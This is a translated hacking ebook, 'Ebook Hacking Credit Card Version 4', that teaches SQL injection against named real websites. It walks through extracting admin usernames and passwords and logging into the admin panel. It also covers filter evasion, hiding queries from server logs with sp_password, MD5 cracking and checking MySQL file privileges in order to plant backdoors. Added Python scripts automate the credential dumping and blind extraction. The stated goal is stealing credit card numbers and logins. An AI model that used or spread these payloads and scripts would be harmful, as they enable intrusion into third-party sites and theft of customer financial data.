
Ebook Hacking Credit Card

Version 4

-----
This is a special version, whose title
will be: Hieupc Returns
Copyright by hieupc
Email: hieupc@gmail.com
Yahoo ID: hieuitpc

Motto: Life is a string of hard days; you have to learn to get through them before you can grow up and succeed. Don't lose heart; think of it simply as one of life's tests.



Published: 09-09-2009


Ebook author: Hieupc
Ebook Hacking Credit Card Version 4 - Hieupc
Foreword:
Time really does fly; four years have passed already, and hieupc's life has changed a lot in that time. From a guy who knew nothing about computers, I suddenly came to know a great deal about them, and I learned a lot about how to speak, how to treat people and about attitude; now I can more or less say I am settled enough to live well in this society. As a kid I dreamed of owning a computer, and my parents bought me one as a surprise gift. At first I went online to read books and news and found lots of new and strange things, and gradually I got to know a few people on the net. To this day I still remember who they were and what their nicknames were. If you ask me how I got to where I am today, the answer is really simple: constant effort to explore and learn; but I was also very lucky to meet the elders of computer networking at the time, which is why I have the fairly broad understanding I have now. I like writing books because I like sharing my knowledge with everyone, and I hope you will take something away from this ebook. So keep learning, keep trying, share in order to receive in return, and above all, don't give up.

P/S: If you find this ebook useful to others, please help Hieupc share it. Please email any feedback or criticism to: hieupc@gmail.com.









My Friends: Ly0kha, PxNam, J 0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa,
Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi

Note: in the articles below some words were set in bold black and in red; those are the ones to pay attention to (the emphasis is lost in this text copy).



Table of Contents:
I. Exploiting PHP Injection:
1. What is PHP Injection?
2. Exploiting PHP Injection thoroughly.
II. Getting Root Server by Many Methods:
1. Exploit technique: Get Root into MySQL Server.
2. Taking Admin via SA on MSSQL Server.
3. What you need to know about Localhack.
III. How To Get These Important Information:
1. How to find the admin link.
2. Getting the important information we need.
IV. Exploiting By Tool, Scripts:
1. Shell Scripts.
2. Hack Tools.
V. Special Things:
1. How to fix SQL Injection and other remedies.
2. Preventing Localhack.
3. SQL Injection practice.











I. Exploiting PHP Injection:
1. What is PHP Injection:
From the server-script side, PHP Injection is the term for a weakness that lets an attacker execute PHP code because a value passed in is used without being checked, for example when the data ends up inside eval() or include().

Example:

<?php
$myvar = 'somevalue';
$x = $_GET['arg'];             // attacker-controlled
eval('$myvar = ' . $x . ';');  // arg is evaluated as PHP code

<?php
$color = 'blue';
if (isset($_GET['COLOR']))
    $color = $_GET['COLOR'];   // attacker-controlled
require($color . '.php');      // loads whatever file name the client supplies
?>

The second snippet is really a file-inclusion bug (the client decides which .php file is loaded) rather than code injection through eval(); both have the same fix: never pass request data to eval() or include(), map it against a fixed allowlist instead.
2. Exploiting PHP Injection thoroughly:

(What follows is SQL injection in PHP applications; the ebook uses "PHP Injection" as a loose name for it.)

SQL Injection is an exploitation technique based on the data exchanged between the user and the web application. Because the application does not validate its input values, an attacker can get unintended SQL queries executed against the database, changing, adding, reading or deleting data.
Hackers usually exploit it by sending input values that make the server produce error messages, and then shaping the input according to the designer's original query.
If the web application has customized error pages, or returns no error page at all, what then? Try exploiting with blind SQL injection.

Example:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
The result is information from the database.
But what if we append a single quote:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1'

The result is a blank page.
Variation 1:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1
=> the page returns the same information from the database as before

Variation 2:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2
=> no product appears.

So the two responses of the site differ. In variation 1 the added condition 1=1 (true) does not change the result of the original query, so the database information is still shown correctly; in variation 2 the added condition 1=2 (false) makes the original query's WHERE clause false, so nothing appears on the page. Based on this we can append queries whose result is either true or false and extract information about the system one answer at a time.
Suppose we do not know the fields and tables of this web application. Using the SQL injection in the URL above, we first find out how many fields its query selects. We need to know this because when we use UNION, the two SELECT statements must have the same number of columns.
We use ORDER BY for this; it makes the count simple and quick.
Determine how many fields the query has, with the URL:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1
There are many ways to do it. Here I use order by <num> with increasing <num>. When order by <num> shows no error, the number of fields is still at least <num>; keep increasing <num> until an error appears, and we have found the number of fields.
Example:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 1 -> still normal
Result: (screenshot in the original)
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 2 -> still normal.
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 10 -> blank page, so that is too many.
So the answer lies below 10, and we try:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 7 -> still normal
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 8 -> blank page. So what does that mean: 7 is still normal, but at 8 the result is a blank page.

Conclusion: 7 is the number we are looking for.
So the SQL query behind this website has 7 fields (columns).
From here we can find out the SQL version and user with the following statements.
Example:
Note the -- at the end.
If the SQL version turns out to be 4.x (anything below 5.0) there is no information_schema, so we will have to guess table and column names.
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,3,4,5,6,7--
Result: the page now renders some of the placeholder numbers (3 and 4 in the original screenshot); those are the columns we can read data through. The id -1 matches no real row, so only the UNION row is displayed.

Check the SQL version:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,version(),4,5,6,7--

Result: (fortunately the SQL version is above 5.0; with this version we can query all table_name or column_name values at once.)

We can also check plenty of other important information with these expressions: version(), user(), database(), @@datadir, group_concat(schema_name) ... from information_schema.schemata (and the table_schema column of information_schema.tables).
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,user(),4,5,6,7--
Result: (screenshot in the original)

We can also collect the values we need in one go: concat_ws(0x3a,version(),user(),database())
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7--
Now we go on to extract tables and columns:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables--
Result: a blank page. What does that mean? We run into this now and then; here is how to deal with it.
Add unhex(hex( in front of group_concat and look at the result:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.tables--
Result: (screenshot in the original; the table list now renders)

What unhex(hex(...)) does is turn the value into a binary string; that sidesteps the character-set/collation mismatch between the injected SELECT and the original one, which is what produced the empty page (or an "Illegal mix of collations" error) above.

In what the ebook calls PHP injection or blind injection (strictly, this is UNION-based injection), we have to hex the table name in order to extract the columns of important tables such as admin, users, accounts. Why hex? Because magic_quotes is ON: any quote we send gets escaped, while a 0x... literal needs no quotes at all.
After extracting all the tables, Hieupc noticed that this site has an important table: admin. Let's try it (table admin hexed by Hieupc: 61646d696e)
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schema.columns where table_name=0x61646d696e--
Remember the 0x in front of the hex string. Likewise we need unhex(hex( again for this site; some other sites may not need it, and it does no harm when they don't.
Result: (screenshot in the original)

As we can see, the two most important columns of table admin are username and pass.
The next step is to query the data we are after:
http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=-1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin

Result: (screenshot in the original)

So we now have:
Username: cuongle
Pass: cuongle
...and a few other admin users.
Note: 0x7c is the | character; we use it to make the output easy to read and to pick the values apart; it is just that character converted to hex. When we query a table whose name we already know, admin in this article, there is no need to hex anything. It is really simple, much like the methods already covered in the earlier ebooks.
Now let's find the admin link: (usually admin, pcadmin, admin_login, admin.php ...)
After some poking around, the admin link turned out to be:
http://www.hoanvustc.com/manager/ now we try logging in with the username and password we just queried.
Result: (screenshot in the original; the login succeeded)
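The whole procedure above (the 1=1 / 1=2 check, the ORDER BY column count, the UNION read of table names, columns and credentials, and the 0x hex literal that avoids quotes) as one runnable walkthrough. This is example code added by the editor, not code from the ebook: it runs against a constructed in-memory SQLite database that stands in for the site's MySQL backend, so information_schema becomes sqlite_master, the 0x literal becomes CAST(X'..' AS TEXT) and group_concat(a,0x7c,b) becomes a||X'7c'||b; the MySQL forms are given in the comments. The table names follow the walkthrough, the rows are made up.

```python
import sqlite3

# Added example (editor's code, not the ebook's). A constructed in-memory SQLite
# database stands in for the site's MySQL backend: the table and column names are
# the ones from the walkthrough, the rows are made up. MySQL-only syntax is noted
# in comments where SQLite needs a different spelling.


def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE services(id INTEGER, lang TEXT, name TEXT, price INTEGER,
                              descr TEXT, img TEXT, k INTEGER);
        INSERT INTO services VALUES
          (1, 'vn', 'Web hosting', 10, 'shared plan', 'host.png', 2),
          (2, 'vn', 'Domain',       5, '.com',        'dom.png',  2);
        CREATE TABLE admin(username TEXT, pass TEXT);
        INSERT INTO admin VALUES ('cuongle', 'cuongle'), ('editor', 'p@ss');
    """)
    return con


def services_page(con, nc):
    """services.php stand-in: nc is pasted into the SQL unquoted, which is the
    bug the text exploits. Returns the rows, or None when the statement fails
    (the real site rendered a blank page in that case)."""
    sql = f"SELECT * FROM services WHERE lang='vn' AND k=2 AND id={nc}"
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def boolean_probe(con):
    """Variation 1 vs 2: a true condition leaves the result alone, a false one
    empties it, and a bare quote breaks the statement."""
    normal = services_page(con, "1")
    return {
        "and 1=1": services_page(con, "1 and 1=1") == normal,
        "and 1=2": services_page(con, "1 and 1=2") == [],
        "quote": services_page(con, "1'") is None,
    }


def count_columns(con, hi=100):
    """The ORDER BY walk as a binary search. 'order by hi' must fail (the
    text's 'order by 100' check); we then narrow to the largest n that still
    renders, which is the column count (the text's 10 -> 7 -> 8 narrowing)."""
    if services_page(con, f"1 order by {hi}") is not None:
        raise ValueError(f"order by {hi} did not fail; raise hi")
    lo = 0
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if services_page(con, f"1 order by {mid}") is None:
            hi = mid
        else:
            lo = mid
    return lo


def mysql_hex_literal(s):
    """'admin' -> 0x61646d696e: no quotes, so magic_quotes has nothing to escape."""
    return "0x" + s.encode().hex()


def mysql_char_literal(s):
    """'admin' -> CHAR(97,100,109,105,110), the ASCII-code spelling."""
    return "CHAR(" + ",".join(str(b) for b in s.encode()) + ")"


def sqlite_hex_literal(s):
    """SQLite's equivalent of the 0x literal (a blob cast back to text)."""
    return f"CAST(X'{s.encode().hex()}' AS TEXT)"


def union_read(con, ncols, expr, from_clause=""):
    """id=-1 matches no real row, so only the UNION row is rendered; expr goes
    in column 3, the slot the screenshot showed as displayed."""
    cols = ["1", "2", expr] + [str(i) for i in range(4, ncols + 1)]
    rows = services_page(con, f"-1 union select {','.join(cols)} {from_clause}--")
    return rows[0][2] if rows else None


def dump_credentials(con):
    n = count_columns(con)
    # MySQL: group_concat(table_name) from information_schema.tables
    tables = union_read(con, n, "group_concat(name)",
                        "from sqlite_master where type='table'")
    # MySQL: group_concat(column_name) from information_schema.columns
    #        where table_name=0x61646d696e
    admin_ddl = union_read(con, n, "sql",
                           "from sqlite_master where name=" + sqlite_hex_literal("admin"))
    # MySQL: group_concat(username,0x7c,pass) from admin
    creds = union_read(con, n, "group_concat(username||CAST(X'7c' AS TEXT)||pass)",
                       "from admin")
    return n, tables, admin_ddl, creds


if __name__ == "__main__":
    db = build_db()
    print(boolean_probe(db))
    print(dump_credentials(db))
```

count_columns() turns the 10 -> 7 -> 8 narrowing from the text into a proper binary search: after one request that confirms order by 100 fails, seven more requests pin down a count anywhere up to 99. The same sqlite3-backed harness is also the cheapest place to try a payload before sending it at a real target.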






Some of Hieupc's experience:
When exploiting blind SQL injection the following functions are useful:
1. SUBSTRING(string, position, length): cuts a piece out of a string
e.g.:
SUBSTRING('dbo', 1, 1) = 'd'
SUBSTRING('dbo', 2, 1) = 'b'
SUBSTRING('dbo', 3, 1) = 'o'
2. LOWER(): converts characters to lowercase
3. UPPER(): converts characters to UPPERCASE
4. ASCII(): converts a character to its ASCII code
5. IF(condition, result1, result2)
Some additional notes:
- Common errors seen with MySQL injection:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\................ on line 37
or the error shows up only as a blank page.
- We can use UNION ALL SELECT as well as UNION SELECT (the ebook also writes "union select all", which is not valid MySQL syntax).
- We can use table_schema to list the tables belonging to a given schema:
http://www.website.com/shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=hieupc (remember to convert hieupc to hex or CHAR() first).
- Sometimes we cannot find the admin link; then we can query what we need (CC, information, user, pass) straight from the database. (Finding the admin link is covered in the next article.)
- Experience shows that a carefully configured website blocks words like union, select, convert. Then try mixing upper and lower case, e.g. UnIoN SelECt. (MySQL keywords are case-insensitive, so this only gets past a filter that compares case-sensitively.)
- An interesting point: once you are in the admin panel, important information such as credit card numbers or customers' passwords may be encrypted or hidden as ****. You can then modify the code, i.e. reverse the hide/unhide logic (this only applies when you have the website's source code).
- On more secure websites, querying tables or columns gives a blank page or an error like the one below, and then there is nothing more to do: (screenshot in the original)
- If the admin user and password you extract are MD5 hashes, you can try to look them up here:
http://www.th3-0utl4ws.com/tools/md5/md5_looker.php

http://gdataonline.com/seekhash.php
- If you meet an unfamiliar encryption format, you have to find its key before you can reverse it.
- Sometimes we find the admin link and can log in directly without user and pass by bypassing the login (covered in the next article).
- We can use + instead of a space, for example: union+all+select.
- In this article Hieupc uses 0x7c for the | character; other characters such as a colon work just as well. To convert text to hex, use:
http://www.string-functions.com/string-hex.aspx

(add 0x in front of each hex string). Example: table admin converts to 61646d696e, and with 0x added becomes 0x61646d696e, which is what goes into the exploit statement.
- Or we can convert to ASCII codes instead of hex. Example: table admin becomes char(97,100,109,105,110)
- A little about the ASCII table:

The 256-code table (strictly, ASCII is the 128 codes 0-127; 128-255 are code-page extensions) is laid out as follows:

+ the first 32 codes are non-printing control characters, for example ENTER (code 13) and ESC (code 27)

+ codes 32-47, 58-64, 91-96 and 123-127 are special characters such as period, semicolon, brackets, question mark ...

+ codes 48-57 are the ten digits

+ codes 65-90 are the uppercase letters A-Z

+ codes 97-122 are the lowercase letters a-z

+ the remaining codes, 128-255, are the extended (non-ASCII) characters.
- The case where the server's error messages are suppressed by putting @ in front of the query; this form is very hard to detect as SQL injection. Example:
$id = $_GET[id]; @mysql_query("SELECT * FROM user WHERE id=$id");

Or error_reporting(0); is placed at the top of the PHP code to hide errors. To detect this, appending a quote as above does not work, because error display is blocked. In that case append a logical expression to the query instead:
http://web.com/user.php?id=1 and 1=1

If the page does not change after adding that expression, it is very likely that the page has a bug we can exploit. (Confirm it with id=1 and 1=2: it is only a real signal when 1=1 gives the normal page and 1=2 gives a different one.)
- Also, some websites Hieupc has hacked hid errors like this: after adding the quote nothing shows, or only part of the page does. Then view the page source and you will find the SQL injection error there.
- View Source is indispensable when hacking web, especially for SQL injection and some other bug classes such as XSS, RFI, LFI.
- If you meet MySQL below version 5, you have to guess the important tables and columns to get the information you need; you can also use tools that scan for tables or columns. Example: (screenshot in the original)
- In some cases we can also use 1,1,1,1,1,1 instead of 1,2,3,4,5,6 in the injected query. (Then you cannot tell which column is the one rendered, so use distinct numbers when that matters.)
- Sometimes order by returns a completely blank page whatever the number; then we have to count by building union select 1,2,... ourselves, starting from 1, until the page renders. For example this site:
http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1
order by 1: still a blank page, so we understand that here we have to count and probe by hand, e.g.:
http://vn.lge.com/index.php?option=products&task=productsdetails&id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14--


Result: (screenshot in the original)

- If, when we add a quote after a suspect page, the result is a completely blank page, the site may well have the bug with its errors hidden (what the ebook calls PHP injection).
- UNION combines the result sets of two SELECT statements (the ebook describes it as joining tables). We can use it once we know exactly how many columns the original query has.
- If an error appears we can add limit 0,1 and then step through limit 1,1, limit 2,1 ... to fetch everything we need row by row.
- We can use concat instead of group_concat.
- We can use null to find the exact number of columns, for example:
http://www.site.com/index.php?page=-1+union+select+null,null/*
http://www.site.com/index.php?page=99999+union+select+null,null/*
- We try the usual queries one after another:
union select null,null
union select null,null,null
union select null,null,null,null
(null has no type, so it never clashes with the types of the original columns; that matters more on strict databases such as SQL Server or Oracle than on MySQL.)

- A quick check of the number of fields:
Order by 100. Obviously no query has 100 columns, so it errors; that tells us ORDER BY works and gives an upper bound, and from there we narrow down to the exact count, which is easy to guess for a site.

- If your query returns so many tables that the important one has not shown up yet, use this function:
site.com/index.php?id=-1 union select 1,2,substr(group_concat(table_name),100,300),3,4,5.. for ordinary sites.

site.com/index.php?id=-1 union select 1,2,unhex(hex(substr(group_concat(table_name),100,300))),3,4,5.. for awkward sites such as the one Hieupc demonstrated above.

To see the next tables change 100 to 200, then 300 ... (Note that group_concat itself truncates at group_concat_max_len, 1024 bytes by default, so when the list looks cut off, walk it with LIMIT/OFFSET as described next.)
- Or we can use LIMIT 1 OFFSET 44-- to see the information that has not been shown yet; change 44 to 45, 46 ... until all tables or columns have appeared. Example:

union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--
(the separator literal is 0x7c; the original prints it as 07c)

- Comment syntax differs between database systems, for example:

Microsoft Access:
MySQL: -- , /* */ , /* , # (in this article Hieupc uses --; note that MySQL only treats -- as a comment when a space follows it, which is why payloads are often written --+ or -- -)
SQL Server: -- , /* */ , null byte %00

- As for sp_password, as far as I know it changes a user's password. Example:

sp_password 'old_pass','new_pass','user'

It is also put after the comment marker in the injected SQL statement to avoid logging. When a T-SQL statement is executed the server records the event; if sp_password is present it does not record our SQL statement (the event is recorded, but not the statement text, even when sp_password comes after the comment, on SQL Server).
- 1 union select current_user,null/*
or
1 union select user(),null/*
These statements reveal the current MySQL user, in the form:
username@server
Or you can guess the user name with blind SQLi if UNION is not possible. Example statements:
1 and user() like 'root%'
1 and mid(user(),1,1)='r'
1 and mid(user(),2,1)>'m'
1 and ascii(substring(user(),1,1))>64
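The SUBSTRING/ASCII/IF tips above and the mid(user(),...) guesses are the building blocks of blind extraction; here is the loop they add up to, as an added example (editor's code, not the ebook's), with a binary search over the character code so each character costs 7 requests instead of up to 127 for a linear walk. It runs against a constructed SQLite table standing in for MySQL, so mid()/ascii() are written substr()/unicode(); the MySQL spelling is in a comment, and the password value is made up.

```python
import sqlite3

# Added example (editor's code, not the ebook's). A constructed SQLite stand-in
# for the MySQL backend; MySQL's mid()/ascii() are spelled substr()/unicode()
# here, and the value being recovered is made up.
con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE admin(username TEXT, pass TEXT);
    INSERT INTO admin VALUES ('cuongle', 's3cret');
""")


def page_shows_row(cond):
    """Boolean oracle: True when the injected 'and <cond>' keeps the row (the
    site renders normally), False when it drops it (the empty page)."""
    sql = f"SELECT username FROM admin WHERE username='cuongle' AND {cond}"
    return bool(con.execute(sql).fetchall())


def extract_blind(expr, max_len=64):
    """Recover the string value of SQL expression `expr` one character at a
    time. Each character is found by binary search on its code (7 requests
    for the 0..127 range) instead of a linear walk with '>' comparisons.
    Returns (value, number_of_requests)."""
    out, calls = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi + 1) // 2
            calls += 1
            # MySQL spelling: 1 and ascii(mid((<expr>),pos,1))>=mid
            if page_shows_row(f"unicode(substr({expr},{pos},1))>={mid}"):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:          # past the end: substr gives '' and the code is NULL
            break
        out += chr(lo)
    return out, calls


if __name__ == "__main__":
    print(extract_blind("username"))
    print(extract_blind("(select pass from admin limit 1)"))
```

The "1 and ..." condition is what the ebook's URLs carry; the same loop drives the file_priv and is_grantable checks of section II by putting the subquery in expr. Characters above 127 need a larger hi; MySQL's ascii() returns only the first byte of a multibyte character anyway.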
What if the SQL version is below 5?
In my opinion the only way is to guess the tables and columns you are after; there are now also some tools and scripts that help scan for them.
Below is an article by Seamoun (HVA) that will help you get a grip on this technique.
Start with the URL:
http://site.com/phpevents/event.php?id=1

Append a quote after id=1; the URL becomes
http://site.com/phpevents/event.php?id=1'

We find that phpevents has a SQL injection bug, from this message:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37

Determine how many fields the query has, with:
http://site.com/phpevents/event.php?id=1
In turn we try:
http://site.com/phpevents/event.php?id=1 order by 1 (<-- still OK)
http://site.com/phpevents/event.php?id=1 order by 2 (<-- still OK)
http://site.com/phpevents/event.php?id=1 order by 3 (<-- still OK)
...

http://site.com/phpevents/event.php?id=1 order by 15 (<-- still OK)
http://site.com/phpevents/event.php?id=1 order by 16 (an error appears)
So the SQL query behind this URL has 15 fields.
Now we can find the SQL version and user with:
http://site.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1
http://site.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1
With the number of fields known, we now guess its login table: try common table names such as manager, admin, administrator, systemlogin ... (Guessing tables is a matter of experience, combined with crawling and spidering the content of the site being exploited; if the source code is available you can also read the table and column names from it.) If the table name is wrong, union all select produces an error; if it is right, it runs OK. Try tables as follows:
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Having guessed the table name admin, next we guess the field names in the admin table we found. The fields of the admin table might be username, uname, user, pass, passwd, password, pword, ... (As above, this depends on experience plus crawling and spidering the site's content to find field names.) Try as follows:
http://site.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

So the first field we guessed is uname in the admin table. Now guess the password field:

http://site.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://site.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

So we guessed the password field: pword. We now have all we need to get the user and pass from the admin table:
the two fields uname and pword, plus the table name admin
Run:
http://site.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin
With the two single-field statements above we could already read user and pass; the statement just shown fetches all users and passes in the admin table in one go. If it raises an error, add limit 0,1 and step through limit 1,1, limit 2,1 to collect every user and pass.
The point of the combined statement is to get uname and pword at the same time, instead of running the query twice.
0x3a is the ':' character. concat joins the strings.
Now we have uname and pword.
If the connection to MySQL uses the root user, finding tables and fields is easier with the following statements.
Listing tables:
http://site.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Listing fields:
http://site.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns
(information_schema exists only from MySQL 5.0 on, and any account can read the rows for the tables it has access to; root is not required, it just sees everything.)

Also, in some cases where an error appears during exploitation, you can use the convert, hex functions so that the exploit no longer errors, as in:
http://site.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin
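Seamoun's pre-5.0 procedure above (table guess, then column guess, then concat) automated against wordlists, as an added example (editor's code, not from the article). It runs on a constructed SQLite database in which the login table is admin(uname, pword) as in the walkthrough, and the only oracle is whether the page's query errors or not, exactly the (Fail)/(OK) pairs of the article. The hash in the sample row is md5('password').

```python
import sqlite3

# Added example (editor's code, not Seamoun's). Constructed SQLite stand-in for
# the phpevents database: the login table really is `admin` with columns
# `uname` and `pword` as in the walkthrough, but the attacker does not know
# that and has to guess from wordlists. The hash is md5('password').
con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE events(id INTEGER, title TEXT, body TEXT);
    INSERT INTO events VALUES (1, 'Launch', 'launch party');
    CREATE TABLE admin(uname TEXT, pword TEXT);
    INSERT INTO admin VALUES ('root', '5f4dcc3b5aa765d61d8327deb882cf99');
""")

NCOLS = 3  # found with ORDER BY beforehand; Seamoun's site had 15


def event_page(id_param):
    """event.php stand-in: returns the rows, or None when the SQL fails
    (the site showed the mysql_numrows() warning in that case)."""
    try:
        return con.execute(f"SELECT * FROM events WHERE id={id_param}").fetchall()
    except sqlite3.Error:
        return None


def guess_table(candidates):
    """'union all select 1,1,1 from <guess>': an unknown table is a SQL error,
    an existing one runs OK (the Fail/OK pairs in the article)."""
    filler = ",".join(["1"] * NCOLS)
    for name in candidates:
        if event_page(f"1 union all select {filler} from {name}") is not None:
            return name
    return None


def guess_column(table, candidates):
    """Put the guessed column name in the first slot; unknown column -> error."""
    filler = ",".join(["1"] * (NCOLS - 1))
    for col in candidates:
        if event_page(f"1 union all select {col},{filler} from {table}") is not None:
            return col
    return None


def dump(table, user_col, pass_col):
    """concat(uname,0x3a,pword) in MySQL; SQLite spells 0x3a as X'3a' and
    concatenation as ||. id=-1 keeps the real rows out of the output."""
    filler = ",".join(["1"] * (NCOLS - 1))
    sep = "CAST(X'3a' AS TEXT)"
    rows = event_page(f"-1 union all select {user_col}||{sep}||{pass_col},{filler} from {table}")
    return [row[0] for row in rows]


if __name__ == "__main__":
    t = guess_table(["systemlogin", "manager", "admin"])
    u = guess_column(t, ["username", "user", "uname"])
    p = guess_column(t, ["password", "passwd", "pword"])
    print(t, u, p, dump(t, u, p))
```

Each wrong guess costs one request, so the wordlist order matters; the article's advice to seed it from crawling the site and from any available source code is what keeps the count low.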

II. Getting Root Server by Many Methods:
1. Exploit technique: Get Root into MySQL Server.
Everything depends on how the MySQL server is configured. So we use a number of statements like the ones below; what follows is an example of a site on which Hieupc got root on the MySQL server:
union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17,18,19
Result: (screenshot in the original)


union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19
Result: (the SQL version is above 5, which is lucky)


union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18,19
Result: (screenshot in the original)

union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17,18,19

Its database directory is: "/var/lib/mysql/"

Now let's check the privileges of the MySQL user (this decides whether we can get root or not):
union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user
The results are as in the picture below: N means No, and Y means Yes:

Now let's try it this way for the MySQL user we queried above, muu (muu converted to ASCII codes is CHAR(109, 117, 117); converted to hex it is 0x6d7575):
union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)
The result is Y for user=muu (so we do have the privilege with this muu user):

You can check the FILE privilege in that table without the where clause too, but Hieupc keeps it because it is the quickest and easiest way, and it carries over when we switch to blind:

1 and mid((select file_priv from mysql.user where user=CHAR(109, 117, 117)),1,1)='Y'

(Do not add NULL here; this is not a union select)
This approach works on both MySQL 4.x and 5.x.
(Reading mysql.user needs SELECT on the mysql database, which a web application's account rarely has; the information_schema route below shows the current account its own grants.)
If MySQL is 5.x we can also read the FILE privilege straight from information_schema:
0 union select grantee,is_grantable FROM information_schema.user_privileges where privilege_type='FILE' and grantee like '%username%'

With blind:
1 and mid((select is_grantable from information_schema.user_privileges where privilege_type='FILE' and grantee like '%username%'),1,1)='Y'
(Strictly, it is the existence of the FILE row that shows the privilege is held; is_grantable only says whether the account may pass it on, so a more accurate blind test is: 1 and (select count(*) from information_schema.user_privileges where privilege_type='FILE' and grantee like '%username%')>0)
Now let's try to get root:
We check whether magic_quotes is OFF or ON. If it is OFF we can use this method to upload a backdoor, and if that works you control the server about 90% of the time. Unfortunately on this server magic_quotes is ON.
(The reason it matters: INTO OUTFILE takes its file name only as a quoted string literal, not as a 0x... or CHAR() value, so once magic_quotes_gpc escapes the quotes this path is closed.)

If you cannot access the mysql.user table or information_schema.user_privileges, you can still go on with the next step. But if you suspect you do not have the FILE privilege, exploitation with into outfile will not work. INTO OUTFILE is the statement used to put malicious code on the site through the injection, such as a backdoor or a shell script.
If so, can we still get root? There is still hope. Here Hieupc uses load_file to read a file on the site, provided we know its exact path; we usually go for the site's config file, such as config.php, db.php, configuration.php.
Once we know for sure that the current MySQL user has the FILE privilege, we need to find the exact path of the directory or file we want to write to.
In most cases the MySQL server runs on the same machine as the web hosting server, so from the default write directory we can reach the web directory with ../ sequences.
On MySQL 4 we can find the datadir from the error produced by:
0 UNION SELECT load_file('a'),null/*
On MySQL 5 we can union select it:
0 UNION SELECT @@datadir,null/*
Result (so this is certainly Windows): (screenshot in the original)

So the Data directory is at: C:\Program Files\MySQL\MySQL Server 5.0\Data\
The default write directory is datadir\databasename (a relative path in INTO OUTFILE is resolved against the directory of the current database).
